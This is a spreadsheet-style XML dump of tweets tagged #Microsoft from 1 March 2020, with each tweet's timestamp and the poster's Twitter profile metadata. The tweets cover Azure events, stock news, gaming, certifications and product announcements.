  <si>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06:15:48 +0000 2020</t>
  </si>
  <si>
    <t>Last 3 days to register for the 2020 #Brisbane #Global #Integration #Bootcamp next Saturday! Don't miss out on the best annual #Microsoft integration event in QLD!  #msbts #logicapps @logicappsio #gib2020 #globalintegration https://t.co/9R1imeYox8</t>
  </si>
  <si>
    <t>{'id': 248028532, 'id_str': '248028532', 'name': 'Daniel Toomey', 'screen_name': 'daniel2me', 'location': 'Australia', 'description': 'Microsoft Azure MVP, @Pluralsight author, speaker, @BrisbaneAzureUG leader, MCSE, MCT, integration geek &amp; former professional musician.', 'url': 'http://t.co/9AvKHPYV8K', 'entities': {'url': {'urls': [{'url': 'http://t.co/9AvKHPYV8K', 'expanded_url': 'http://mindovermessaging.com/', 'display_url': 'mindovermessaging.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 766, 'friends_count': 153, 'listed_count': 38, 'created_at': 'Sun Feb 06 03:07:14 +0000 2011', 'favourites_count': 596, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1377,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'http://pbs.twimg.com/profile_images/849960694967488512/gIZH3QIa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/849960694967488512/gIZH3QIa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/248028532/1530878247',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</si>
  <si>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06:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, AI is helping working parents manage work/life balance. #Microsoft https://t.co/NAFYfaWxy3</t>
  </si>
  <si>
    <t>Sun Mar 01 05:47:16 +0000 2020</t>
  </si>
  <si>
    <t>Azure Firewall Manager now supports virtual networks:https://t.co/NnraM4LJlN
For our services call us at :+97143210808/+971559468090
Get Our Services here : https://t.co/jTyXCxN0qH
#Microsoft #Azure #Firewall #Manager #Support #Virtual #Network  #Microexcel #UAE https://t.co/Zv9rDY2rkT</t>
  </si>
  <si>
    <t>{'id': 2371552243, 'id_str': '2371552243', 'name': 'Microexcel Tech LLC', 'screen_name': 'MicroexcelLLC', 'location': 'Dubai, UAE - Middle East', 'description': '@MicroexcelTechnologies LLC, a #MicrosoftGoldCertified and #SAP Services Partner in #Dubai, is a leader in providing innovative #softwaresolutions', 'url': 'http://t.co/SbSCPSi5eG', 'entities': {'url': {'urls': [{'url': 'http://t.co/SbSCPSi5eG', 'expanded_url': 'http://www.microexcel.ae', 'display_url': 'microexcel.ae', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 206, 'friends_count': 1417, 'listed_count': 9, 'created_at': 'Tue Mar 04 07:29:25 +0000 2014', 'favourites_count': 68, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 675,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'http://pbs.twimg.com/profile_images/893413128288976897/GeggDot__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/893413128288976897/GeggDot__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2371552243/1525066151', 'profile_link_color': '17556B',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</si>
  <si>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Sun Mar 01 05:46:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft loses $232 billion in #market cap in 7 days https://t.co/ODiFCwvN6d</t>
  </si>
  <si>
    <t>Sun Mar 01 05:40:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft copy and paste issues and mail app issues</t>
  </si>
  <si>
    <t>Sun Mar 01 05:37:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft copy and paste issues</t>
  </si>
  <si>
    <t>Sun Mar 01 05:35:31 +0000 2020</t>
  </si>
  <si>
    <t>Check out New Original OEM Xbox 360 Composite RCA A/V Cable Cord Black #Microsoft https://t.co/v4fRY4ZdTa via @eBay</t>
  </si>
  <si>
    <t>Sun Mar 01 05:35:14 +0000 2020</t>
  </si>
  <si>
    <t>Bought a little @Microsoft &amp;amp; @intel #stocks Friday.  Im a buyer of either #stock if their is another major down day.  The #StockMarketCrash2020 will be a future footnote.  Im also a younger #Trader / #investor so my goals and time horizon is longer. #Microsoft #Intel</t>
  </si>
  <si>
    <t>{'id': 2915339708, 'id_str': '2915339708', 'name': 'bringbackdrexel', 'screen_name': 'bringbackdrexel', 'location': 'California, USA', 'description': 'Trading stocks, free markets, corporate fraud watcher, so $OSTKQ. guess I have positions in stocks i tweet, do your own due diligence.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 267, 'friends_count': 1781, 'listed_count': 4, 'created_at': 'Mon Dec 01 06:24:36 +0000 2014', 'favourites_count': 4182, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2705,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'http://pbs.twimg.com/profile_images/973675928642453504/YsKIiWGV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/973675928642453504/YsKIiWGV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2915339708/1517654280',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</si>
  <si>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05:34:35 +0000 2020</t>
  </si>
  <si>
    <t>I Just Posted A New Video On YouTube!
Please Check It Out And Maybe Subscribe!
(Link In Bio)
#clips
#video
#gamer
#gaming
#games
#game
#happy
#smile
#goodvibes
#fun
#fortnite
#fortnitegame
#xbox
#microsoft
#fortnitebr
#fortnitebattleroyale https://t.co/JTZqtd9V8x</t>
  </si>
  <si>
    <t>{'id': 1168458370069647361, 'id_str': '1168458370069647361', 'name': 'ItzNate', 'screen_name': 'ItzNate6', 'location': '', 'description': 'This Is The Twitter Page Of YouTuber "ItzNate" I Enjoy Making Gaming Videos On My Youtube Channel And Making Montages For Twitter And Instagram!', 'url': 'https://t.co/wkTfQY2kPF', 'entities': {'url': {'urls': [{'url': 'https://t.co/wkTfQY2kPF', 'expanded_url': 'https://www.youtube.com/channel/UC8EURhziOlYklPJBGBpVOdA', 'display_url': 'youtube.com/channel/UC8EURâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Mon Sep 02 09:41:36 +0000 2019', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 123, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168461011164119040/4BQvBTDY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168461011164119040/4BQvBTDY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1168458370069647361/1570440205',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</si>
  <si>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05:33:02 +0000 2020</t>
  </si>
  <si>
    <t>Don't know anything about #coding? No prob! Gema joined Sabio and got accepted into #Microsoft's prestigious LEAP program. You can too!
https://t.co/sLHM2DsRrz
#WomenInTech #Javascript #LearnToCode #Technology #Java #100DaysofCode #Tech #Programming #WebDesign #Development https://t.co/InE5xeTW1S</t>
  </si>
  <si>
    <t>Sun Mar 01 05:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Become cloud-ready at the free #Microsoft #Azure Training Day: Fundamentals event on 02nd March. Register now: https://t.co/ZDudk4TveA https://t.co/fkO8CADTNS</t>
  </si>
  <si>
    <t>{'id': 21745614, 'id_str': '21745614', 'name': 'Microsoft Developer', 'screen_name': 'msdevindia', 'location': 'India', 'description': 'Microsoft Developer India is your resource for development tips, tricks, research, case studies...Everything you need to develop apps that users love.', 'url': 'http://t.co/XecdwotJYo', 'entities': {'url': {'urls': [{'url': 'http://t.co/XecdwotJYo', 'expanded_url': 'http://aka.ms/msdnindia', 'display_url': 'aka.ms/msdnindia', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21583, 'friends_count': 458, 'listed_count': 345, 'created_at': 'Tue Feb 24 11:18:44 +0000 2009', 'favourites_count': 2589, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13665,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'http://pbs.twimg.com/profile_images/378800000580302272/10ffe9eda0de4670955cc9bdfa78fe9b_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000580302272/10ffe9eda0de4670955cc9bdfa78fe9b_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21745614/1582868187',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'regular'}</t>
  </si>
  <si>
    <t>Sun Mar 01 05:24:03 +0000 2020</t>
  </si>
  <si>
    <t>ASUS Republic of Gamers Teams Up with #Microsoft $MSFTs Mixer Community https://t.co/P7wLsZvEvi https://t.co/Q7W31HSNwM</t>
  </si>
  <si>
    <t>Sun Mar 01 05:22:36 +0000 2020</t>
  </si>
  <si>
    <t>AI-100 Designing and Implementing an #Azure #AI Solution Certification Exam
 #ML #Microsoft
https://t.co/sLgA4O0GhT</t>
  </si>
  <si>
    <t>Sun Mar 01 05:19:51 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office Home and Student 2016 | PC
https://t.co/rp51Q8mCMX
#Microsoft #PC #software</t>
  </si>
  <si>
    <t>{'id': 935001180673007616, 'id_str': '935001180673007616', 'name': 'Pete Ashworth', 'screen_name': 'yipparau', 'location': 'Sydney, New South Wales', 'description': 'yippar has changed approach.', 'url': 'https://t.co/y78sGrAqoN', 'entities': {'url': {'urls': [{'url': 'https://t.co/y78sGrAqoN', 'expanded_url': 'http://www.8088.com.au', 'display_url': '8088.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 236, 'friends_count': 938, 'listed_count': 2, 'created_at': 'Mon Nov 27 04:23:47 +0000 2017', 'favourites_count': 126, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 781, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/935401725057314816/w4HKjHjH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935401725057314816/w4HKjHjH_normal.jpg',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</si>
  <si>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05:16:15 +0000 2020</t>
  </si>
  <si>
    <t>Beautifully Designed Presentation Template 
https://t.co/FvZdOLUY6l
It's Elements! Easy to Edit &amp;amp; Create!
#powerpoint #element #elements #sunday #SundayMotivation #SundayThoughts #SundayService #SundayMorning #sundaymood #SundayFunday #slide #design #ppt #Microsoft https://t.co/WbMcPaHCBV</t>
  </si>
  <si>
    <t>Sun Mar 01 05:06:14 +0000 2020</t>
  </si>
  <si>
    <t>@EpicGames @Microsoft @xbox widespread issues of not being able to communicate during squad/duo matches unless we are xbox live friends. I'm on #Xbox. Is this a #Microsoft issue? Maybe this has something to do with your revenue dropping @FortniteGame</t>
  </si>
  <si>
    <t>{'id': 3794981297, 'id_str': '3794981297', 'name': 'The Ghost of The Great Gazoo', 'screen_name': 'ocwoodie', 'location': 'Aurora, CO', 'description': 'Sarcastic ahole. New(er) account. Last 1 was perm suspended 4 ill will on Don Jr and TL.  I swear and hate ðŸ„rump. #FBR @VABlueBelle18â¤ #1337', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4417, 'friends_count': 4555, 'listed_count': 3, 'created_at': 'Sun Sep 27 17:22:04 +0000 2015', 'favourites_count': 3724, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 852,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'http://pbs.twimg.com/profile_images/1201999978274574336/huft1Y-V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201999978274574336/huft1Y-V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3794981297/1565750908',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</si>
  <si>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05:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your #cloud strategy with Skytap on #Azure https://t.co/8cGi3w1zgk #microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 05:04:34 +0000 2020</t>
  </si>
  <si>
    <t>I've been seeing unusual amount traffic for my Microsoft Retiring Windows 10 Exam video on #YouTube. A Google search turned up an announcement that #Microsoft is retiring their legacy #MCSA/#MCSD/#MCSE #certifications. I need to make another video.
https://t.co/rHul1zYCe7</t>
  </si>
  <si>
    <t>{'id': 14263748, 'id_str': '14263748', 'name': 'C.D. Reimer', 'screen_name': 'cdreimer', 'location': 'Silicon Valley', 'description': 'C.D. Reimer makes videos about comic cons, pop culture, Silicon Valley and technology. A new video every Sunday and occasional bonus videos.', 'url': 'https://t.co/EijpVC4IbO', 'entities': {'url': {'urls': [{'url': 'https://t.co/EijpVC4IbO', 'expanded_url': 'http://www.youtube.com/cdreimer', 'display_url': 'youtube.com/cdreimer', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 990, 'friends_count': 1590, 'listed_count': 38, 'created_at': 'Mon Mar 31 05:15:20 +0000 2008', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 924,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'http://pbs.twimg.com/profile_images/1215343005483204609/Q4Bu4iBq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215343005483204609/Q4Bu4iBq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14263748/1580522631', 'profile_link_color': 'FF0000', 'profile_sidebar_border_color': 'F2E195', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 05:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/GKVcvq9mnl</t>
  </si>
  <si>
    <t>Sun Mar 01 05:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, AI is helping working parents manage work/life balance. #Microsoft https://t.co/4qP5BFpDj4</t>
  </si>
  <si>
    <t>Sun Mar 01 04:36:38 +0000 2020</t>
  </si>
  <si>
    <t>Can you beat Pokemon Platinum Without Taking Damage? #pikachu #cod #retro #microsoft https://t.co/zRqPh5YHOs</t>
  </si>
  <si>
    <t>Sun Mar 01 04:32:10 +0000 2020</t>
  </si>
  <si>
    <t>Who's into naked meeting hot girls? #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 04:30:03 +0000 2020</t>
  </si>
  <si>
    <t>How to Setup AirPods on a Windows 10 Computer! https://t.co/woX2cfdfgS  #AirPods #AirPod #airpods #Windows #Windows10 #windows #Microsoft #AirPods2 #Tutorial #tutorial</t>
  </si>
  <si>
    <t>Sun Mar 01 04:28:31 +0000 2020</t>
  </si>
  <si>
    <t>Check my previous post for examples of the quality of headshot images. Or just see my brand new #LinkedIn headshot. 
#theBOLDjourney #microsoftlife #microsoft #LinkedIn @LinkedIn @MicrosoftLife</t>
  </si>
  <si>
    <t>{'id': 968651639497330688, 'id_str': '968651639497330688', 'name': 'Akosua', 'screen_name': 'akosba_', 'location': '', 'description': "#ReEnvisionAfrica â„¢|#theBOLDjourney â„¢ |Jer' 29:11 |ðŸ‡¬ðŸ‡­ðŸ‡§ðŸ‡¼ |Program Manager @microsoft|Beta Tester @linkedin|Creating positive impact one #BOLD step at a time", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 28, 'listed_count': 1, 'created_at': 'Wed Feb 28 00:58:42 +0000 2018', 'favourites_count': 121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 133, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/968726963140558848/k067s9jT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/968726963140558848/k067s9jT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/968651639497330688/1519780230',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</si>
  <si>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04:25:15 +0000 2020</t>
  </si>
  <si>
    <t>Great news as Microsoft Surface Duo may launch as soon as Spring, and ship soon after
#microsoft #surfaceduo #surfaceneo https://t.co/yy71M6i75X</t>
  </si>
  <si>
    <t>Sun Mar 01 04:22:30 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/DsVXtXOBiO</t>
  </si>
  <si>
    <t>{'id': 1111643222583865344, 'id_str': '1111643222583865344', 'name': 'ARP', 'screen_name': 'panahnoori', 'location': 'C', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 37, 'listed_count': 0, 'created_at': 'Fri Mar 29 14:56:12 +0000 2019', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 40, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1166340989142700033/u3mMfsNC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166340989142700033/u3mMfsNC_normal.jpg',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</si>
  <si>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04:15:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Safe Documents keeps all your files protected https://t.co/LatnzdGuKt #cybersecurity  #TechJunkieNews https://t.co/auAjE1LSqT</t>
  </si>
  <si>
    <t>Sun Mar 01 04:04:34 +0000 2020</t>
  </si>
  <si>
    <t>Work camera creeping on me. I wasnt the only one in the meeting... AI camera is just dumb. #samsung #microsoft @ Papillion, Nebraska https://t.co/N3y44gLceU</t>
  </si>
  <si>
    <t>{'id': 66260264, 'id_str': '66260264', 'name': 'Robbie Adams', 'screen_name': 'jiveadams', 'location': 'Omaha, NE', 'description': 'Graduate of @Creighton. Work for @Infogroup. Former employee at @Oath. Legacy @Yahoo. Futurist, includer, responsible, idealist. Instagram: @jiveadams', 'url': 'https://t.co/j7BvV17qX8', 'entities': {'url': {'urls': [{'url': 'https://t.co/j7BvV17qX8', 'expanded_url': 'http://www.last.fm/user/robku05', 'display_url': 'last.fm/user/robku05', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 256, 'friends_count': 379, 'listed_count': 6, 'created_at': 'Mon Aug 17 03:02:11 +0000 2009', 'favourites_count': 10959, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5841,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'http://pbs.twimg.com/profile_images/780597435655528448/0fwFEsVg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/780597435655528448/0fwFEsVg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66260264/1429838958',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</si>
  <si>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Sun Mar 01 03:48:50 +0000 2020</t>
  </si>
  <si>
    <t>@globaltimesnews Attention to: #Tesla #microsoft #facebook #amazon...</t>
  </si>
  <si>
    <t>{'id': 4756733365, 'id_str': '4756733365', 'name': '$â˜€ï¸Cal', 'screen_name': 'Maku1316', 'location': 'California, USA', 'description': 'psychology research training, I write for Show more replies, #MAGA ðŸ‘¨\u200dðŸ‘©\u200dðŸ‘§\u200dðŸ‘¦ ðŸ¾, ðŸš«DM', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 859, 'friends_count': 207, 'listed_count': 24, 'created_at': 'Thu Jan 14 06:21:46 +0000 2016', 'favourites_count': 105937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 50211, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/799828116495446017/IPv_kboo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/799828116495446017/IPv_kboo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4756733365/1474320743',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</si>
  <si>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03:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Register today for @Axway and @Microsoft webinar on February 27th (French) &amp;amp; March 5th (English version). Discover how Axway #AMPLIFY API Management on @azure benefits your company. #apimanagement #hybrid #microsoft https://t.co/msHyzQuuvA https://t.co/1UshwGTA1X</t>
  </si>
  <si>
    <t>Sun Mar 01 03:45:58 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft store and wifi and connection and feedback hub and edge and chrome and google and youtube slow down and bad browsing and browser's and internet and networking and speed it's bad so much</t>
  </si>
  <si>
    <t>Sun Mar 01 03:44:03 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 Users Warned As Hackers Target Newly Updated Computers https://t.co/y7Eiwp3npo #technews #technology #microsoft #security</t>
  </si>
  <si>
    <t>Sun Mar 01 03:43:56 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft Employee Pleads Guilty for Stealing More Than $10 Million Worth Company Digital Asset
Read More: https://t.co/9cGPw0Abie
#Microsoft #Cybersecurity https://t.co/oWDgtAGrf8</t>
  </si>
  <si>
    <t>{'id': 775281163933888512, 'id_str': '775281163933888512', 'name': 'GBHackers on Security', 'screen_name': 'gbhackers_news', 'location': 'India', 'description': 'Trusted Cybersecurity &amp; Hacking News Platform. Get Daily Live updates on #Breakingnews #Hackingnews #Investigation #CyberAttack #Breach #Malware #Vulnerability', 'url': 'https://t.co/9WvwHIwOO3', 'entities': {'url': {'urls': [{'url': 'https://t.co/9WvwHIwOO3', 'expanded_url': 'https://gbhackers.com/', 'display_url': 'gbhackers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4991, 'friends_count': 1784, 'listed_count': 87, 'created_at': 'Mon Sep 12 10:33:28 +0000 2016', 'favourites_count': 425, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5515,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'http://pbs.twimg.com/profile_images/936115325988306944/mN_bDjB2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/936115325988306944/mN_bDjB2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/775281163933888512/1512024515',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</si>
  <si>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03:42:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is removing Cortana support completely from it's Android launcher and partially removing from windows 10.
#Windows #Microsoft via: multiple sources</t>
  </si>
  <si>
    <t>{'id': 1047201495739842562, 'id_str': '1047201495739842562', 'name': 'Saadh Jawwadh', 'screen_name': 'SaadhJawwadh', 'location': 'Sri Lanka', 'description': 'YouTube Channel: https://t.co/y2PH4afVR4\n\nInstagram:https://t.co/lXsVYYTQoH', 'url': 'https://t.co/lThaR5WhAS', 'entities': {'url': {'urls': [{'url': 'https://t.co/lThaR5WhAS', 'expanded_url': 'https://bit.ly/2YbzaqA', 'display_url': 'bit.ly/2YbzaqA', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/y2PH4afVR4', 'expanded_url': 'http://bit.ly/2YbzaqA', 'display_url': 'bit.ly/2YbzaqA', 'indices': [17, 40]}, {'url': 'https://t.co/lXsVYYTQoH', 'expanded_url': 'http://www.instagram.com/saadh_jawwadh', 'display_url': 'instagram.com/saadh_jawwadh', 'indices': [52, 75]}]}}, 'protected': False, 'followers_count': 56, 'friends_count': 216, 'listed_count': 0, 'created_at': 'Tue Oct 02 19:07:47 +0000 2018', 'favourites_count': 1524, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 434, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233332369131757568/qnWx2CoJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233332369131757568/qnWx2CoJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1047201495739842562/1579706539',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</si>
  <si>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03:37:44 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10: Containers are the future, and here's what you need to know https://t.co/AqBGoVvLeX #technews #technology #microsoft #productivity</t>
  </si>
  <si>
    <t>Sun Mar 01 03:35:48 +0000 2020</t>
  </si>
  <si>
    <t>Google Certified Associate Cloud Engineer Practice Test 2020 
https://t.co/HzjlghxZj4
#GoogleCloudPlatform #GooglePay #Software #BehindTheSlides #GoogleSlides #CyberSecurity #Microsoft #adoptmetrading #NintendoSwitch #Xbox #html5 #css3 #100DaysOfCode #webdev #100DaysOfMLCode https://t.co/HAvjriQ0b1</t>
  </si>
  <si>
    <t>{'id': 1139372482698207232, 'id_str': '1139372482698207232', 'name': 'course nar', 'screen_name': 'CourseNar', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 20, 'listed_count': 3, 'created_at': 'Fri Jun 14 03:22:23 +0000 2019', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 587, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1139372989424685061/VLXGHWIB_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1139372989424685061/VLXGHWIB_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1139372482698207232/1560482786',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</si>
  <si>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03:21:07 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/kEDtWBuovl
#Nintendo is going down hill and will be joining Sega soon. The underpowered Switch is worth $100 at best. #Microsoft needs to buy this company so Mario and Zelda fans can finally play in HD.  This video shows what Zelda should look like. $NTDOY $MSFT</t>
  </si>
  <si>
    <t>{'id': 211447224, 'id_str': '211447224', 'name': 'Florida Boy', 'screen_name': 'FloridaBoyyyyy', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 140, 'friends_count': 207, 'listed_count': 3, 'created_at': 'Wed Nov 03 08:36:49 +0000 2010', 'favourites_count': 197, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2050,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'http://pbs.twimg.com/profile_images/760325153255456768/jtGJajJ0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/760325153255456768/jtGJajJ0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/211447224/1470108766', 'profile_link_color': '311B92',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</si>
  <si>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03:19:04 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Watch this 28-second video to get a 10,000-foot view on how #MSDyn365BC connects businesses, enables smarter decisions, and helps foster growth. #MSDyn365 #Technology #IT https://t.co/IkAavNY8M1</t>
  </si>
  <si>
    <t>Sun Mar 01 03:19:03 +0000 2020</t>
  </si>
  <si>
    <t>Sun Mar 01 03:04:37 +0000 2020</t>
  </si>
  <si>
    <t>@erikkain Dang bro. You are really reaching for those clicks. That second paragraph was so dishonest I stopped reading this. Btw, we know plenty about the Series X.
https://t.co/31B2nl4HWm
@Dealer_Gaming @Colteastwood #Xbox #PS5 #IGN #Microsoft</t>
  </si>
  <si>
    <t>{'id': 983919163394605056, 'id_str': '983919163394605056', 'name': 'Israel Munoz (Izzy)', 'screen_name': 'IzTheLatinGamer', 'location': 'San Diego, CA', 'description': 'QA Analyst and Game Developer at Third Light Interactive. I love God, My Family, Gaming, and Soccer. Life is good! :)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 79, 'listed_count': 0, 'created_at': 'Wed Apr 11 04:06:23 +0000 2018', 'favourites_count': 850, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 199, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/984894187626610689/8A-OZ-zS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984894187626610689/8A-OZ-zS_normal.jpg',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</si>
  <si>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03:00:43 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- February 29, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Sun Mar 01 03:00:02 +0000 2020</t>
  </si>
  <si>
    <t>What The End Of Microsoft Windows 7 Means For Current Business Users , Read more on Global Banking &amp;amp; Finance Review. What the end of Microsoft Windows 7 means for current business users - Global Banking &amp;amp; Finance Review #microsoft #windows #business https://t.co/SIU3VtLrJg</t>
  </si>
  <si>
